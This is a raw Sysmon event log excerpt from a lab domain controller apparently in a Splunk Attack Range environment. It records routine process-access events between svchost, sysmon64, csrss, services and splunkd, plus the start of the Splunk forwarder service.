12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.041{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 